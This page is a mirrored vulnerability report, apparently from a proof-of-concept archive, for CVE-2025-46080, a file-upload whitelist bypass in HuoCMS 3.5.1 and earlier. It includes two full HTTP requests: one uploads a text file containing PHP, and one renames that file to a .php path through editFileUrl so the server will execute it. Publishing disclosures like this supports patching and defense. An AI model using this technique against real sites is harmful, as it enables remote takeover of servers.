关联漏洞
标题:HuoCMS 安全漏洞 (CVE-2025-46080)Description:Suq HuoCMS是中国南京数旗科技(Suq)公司的一种基于ThinkPHP6和Vue3开发的现代化内容管理系统。 HuoCMS 3.5.1版本存在安全漏洞,该漏洞源于文件上传功能可能绕过白名单限制,导致服务器被控制。
Description
Details
介绍
## BUG_Author:
yggcwhat
## Affected version:
Huocms
## Vendor:
https://huocms.com/
## Source Code Address:
https://gitee.com/digital-flag/huocms
## Vulnerability File:
AttachmentController.php
## Affected Version:
HuoCMS - <=V3.5.1
## Description:
app ->controller ->backend -> AttachmentController.php:editFileUrl()
The suffix of $newPathUrl in the "copy" function called in the "editFileUrl" method is not verified by the whitelist, which can be exploited to modify the file name. The suffix is controlled by the passed-in suffix_url and is controllable.
Step 1: Upload a file with a whitelisted suffix that contains malicious content in advance, and record the file ID at the same time.
```
POST /attachment/uploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: token
Content-Type: multipart/form-data; boundary=----geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Length: 581
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php/Index/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="type"
2
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="attachment_cate_id"
0
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="reduce_img"
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
<?php
echo "hello word!"
?>
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9--
```
Based on the content, the ID is determined to be 67.
Step 2: Then construct a request based on the editFileUrl, rename the one with id 67, where the copy function in the vulnerability's editFileUrl is called to rename the file with an illegal suffix.
```
POST /attachment/editFileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: token
Content-Length: 83
Origin: http://127.0.0.1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
id=67&name=test&prefix_url=&suffix_url=file/20250416/test.php&description=123123123
```
Note: To modify it again, you need to change the filename of `suffix_url` to bypass the `copy` function triggered by `$oldPathUrl != $newPathUrl` inside `editFileUrl`.
Access URL: http://127.0.0.1/storage/file/20250416/test.php
## Reference:
http://huocms.com
https://github.com/yggcwhat/CVE-2025-46080/edit/main/README.md
https://www.huocms.com/
文件快照
[4.0K] /data/pocs/e8c94f598e034908dbed871c544f22a40f8ac412
└── [3.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →